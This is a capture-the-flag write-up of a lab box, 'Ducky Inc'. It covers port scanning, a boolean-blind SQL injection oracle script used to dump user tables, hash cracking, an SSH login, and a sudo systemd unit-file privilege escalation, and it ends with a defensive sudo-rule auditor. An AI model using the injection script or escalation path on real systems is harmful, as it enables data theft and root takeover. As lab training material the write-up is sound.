```
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.93.26:22
Open 10.10.93.26:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 04:23 EDT
Initiating Ping Scan at 04:23
Scanning 10.10.93.26 [2 ports]
Completed Ping Scan at 04:23, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:23
Completed Parallel DNS resolution of 1 host. at 04:23, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 5, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 04:23
Scanning 10.10.93.26 [2 ports]
Discovered open port 22/tcp on 10.10.93.26
Discovered open port 80/tcp on 10.10.93.26
Completed Connect Scan at 04:23, 0.30s elapsed (2 total ports)
Nmap scan report for 10.10.93.26
Host is up, received conn-refused (0.30s latency).
Scanned at 2023-06-17 04:23:48 EDT for 1s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack
```
The server exposes two ports: SSH (22) and HTTP (80). Let's start with the website.
After browsing the site, we notice that the products page looks vulnerable to SQL injection: the product ID from the URL is used in a query without sanitisation.
When we append "1 and 1 = 1" the page renders normally, but "1 and 1 = 0 --" returns an error. The application never shows query results or database errors directly, but this true/false difference in the response is enough to use as an oracle for a boolean-based blind injection.
0x01 SQLI
Here we can use "SQLME0w", a boolean-based blind SQL injection helper written by Steven Meow, with slight modifications to its oracle function, to extract data from the database one true/false question at a time.
```python
import requests


def boolean_based_blind(condition):
    """Oracle: return True when the injected condition makes the page render normally.

    The condition is appended to the vulnerable product ID and terminated with a
    SQL comment so the rest of the original query is ignored.
    """
    url = 'http://10.10.93.26/products/'  # change me
    query = condition                     # change me
    response = requests.get(url + query + "--")  # maybe change me
    # The target answers 200 for a true condition and an error page otherwise;
    # on other targets change this to a keyword or content-length check.
    if int(response.status_code) == 200:  # change me to other keyword or length
        return True
    else:
        return False


def test():
    """Sanity-check the oracle: a known-true and a known-false condition must differ."""
    meow = boolean_based_blind("1 and 1 = 1 ")
    print("Intend True: ", meow)
    meowmeow = boolean_based_blind("1 and 1 = 0")
    print("Intend False: ", meowmeow)
    if meow and not meowmeow:
        print("✅ Test success 🐱🐱🐱🐱🐱🐱🐱🐱🐱")
    else:
        print("❌ Test fail 😿😿😿😿😿😿😿😿😿😿")
    # print(boolean_based_blind("1=1"))  # Return True
    # print(boolean_based_blind("1=0"))  # Return False
```
```
🐱 (0) System Test
🐱 (1) Get Current DB
🐱 (2) Get All DBS
🐱 (3) Get Tables
🐱 (4) Get Columns
🐱 (5) Get Data
Your Option : 0
Threads (Suggest 10): 4
Intend True:  True
Intend False:  False
✅ Test success 🐱🐱🐱🐱🐱🐱🐱🐱🐱
```
With the oracle working, we can dump the "user" table and retrieve the first flag.
From the "system_user" table we also obtain the username and password hash of an account named "server-admin". Since the password is stored as a hash, we try to crack it with John the Ripper (John).
The hash cracks, and we now have the server-admin password. Let's try to log in over SSH.
```
System information disabled due to load higher than 1.0

8 packages can be updated.
0 updates are security updates.

################################################################################
#                    Ducky Inc. Web Server 00080012                            #
#                                                                              #
#        This server is for authorized Ducky Inc. employees only               #
#          All actiions are being monitored and recorded                       #
#            IP and MAC addresses have been logged                             #
################################################################################
Last login: Wed Aug 12 20:09:36 2020 from 192.168.86.65
server-admin@duckyinc:~$ ls
flag2.txt
server-admin@duckyinc:~$ cat flag2.txt
thm{4xxxxxxxxxxe}
```
0x02 Privilege Escalation
The first thing to do after landing on a box is to check what we are allowed to run with elevated privileges, starting with sudo.
```
server-admin@duckyinc:~$ sudo -l
Matching Defaults entries for server-admin on duckyinc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User server-admin may run the following commands on duckyinc:
    (root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service,
        /bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload,
        sudoedit /etc/systemd/system/duckyinc.service
```
Interesting: we may run a handful of systemctl operations as root, and, more importantly, we may edit the unit file of the very service we are allowed to restart. A service's ExecStart runs with whatever privileges systemd gives the unit, so the combination of writing a unit file and restarting it is effectively root.
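The check a practitioner wants to automate here is exactly that pairing: a sudo rule that lets a user write a systemd unit file, together with a rule that lets the same user start, restart or reload it. The following is an added example (not code from the original post) that parses `sudo -l` output and flags such pairs; the sample input is the listing shown above for server-admin, and the helper names are my own.

```python
import re

# sudo -l output as shown on the page for server-admin on duckyinc.
SUDO_L_OUTPUT = """\
Matching Defaults entries for server-admin on duckyinc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User server-admin may run the following commands on duckyinc:
    (root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service, /bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload, sudoedit /etc/systemd/system/duckyinc.service
"""

# One sudo rule line: "(runas) [NOPASSWD:] cmd1, cmd2, ..."
_RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?:NOPASSWD:\s*)?(?P<cmds>.+)$")
# Commands that write a unit file: sudoedit, or an editor, on /etc/systemd/system/<unit>
_UNIT_EDIT_RE = re.compile(
    r"^(?:sudoedit|(?:/usr)?/bin/(?:vi|vim|nano))\s+(/etc/systemd/system/(?P<unit>[\w.@-]+))$"
)
# systemctl verbs that (re)execute a unit's ExecStart, or re-read unit files.
_CTL_RE = re.compile(r"^(?:/bin/|/usr/bin/)?systemctl\s+(?P<verb>start|restart|reload-or-restart|daemon-reload)(?:\s+(?P<unit>[\w.@-]+))?$")


def parse_sudo_rules(text):
    """Return a list of (runas, command) pairs from the 'may run' block of sudo -l."""
    rules = []
    in_block = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_block = True
            continue
        if not in_block:
            continue
        m = _RULE_RE.match(line.strip())
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), cmd.strip()))
    return rules


def unit_file_takeovers(rules):
    """Flag units whose file the user can write AND which the user can (re)start as root.

    Returns a dict: unit -> {"edit": cmd, "run": [systemctl cmds for that unit]}.
    daemon-reload counts as a supporting command but is not sufficient on its own.
    """
    editable = {}   # unit -> editing command
    runnable = {}   # unit -> list of systemctl commands that execute it
    reload_ok = set()
    for runas, cmd in rules:
        if runas != "root":
            continue
        m = _UNIT_EDIT_RE.match(cmd)
        if m:
            editable[m.group("unit")] = cmd
            continue
        m = _CTL_RE.match(cmd)
        if m:
            if m.group("verb") == "daemon-reload":
                reload_ok.add(runas)
            else:
                runnable.setdefault(m.group("unit"), []).append(cmd)
    findings = {}
    for unit, edit_cmd in editable.items():
        if unit in runnable:
            findings[unit] = {"edit": edit_cmd, "run": runnable[unit],
                              "daemon_reload": "root" in reload_ok}
    return findings


def audit(text):
    """Convenience wrapper: parse sudo -l output and report takeover candidates."""
    return unit_file_takeovers(parse_sudo_rules(text))


if __name__ == "__main__":
    for unit, info in audit(SUDO_L_OUTPUT).items():
        print(f"[!] {unit}: writable via '{info['edit']}', executable via {info['run']}")
```

The same rule set without the `sudoedit` entry (or without `start`/`restart`) would produce no finding: being able to restart a service you cannot modify, or modify one you cannot restart, is not by itself a root path, which is why the check looks for the pair rather than for systemctl in sudoers alone.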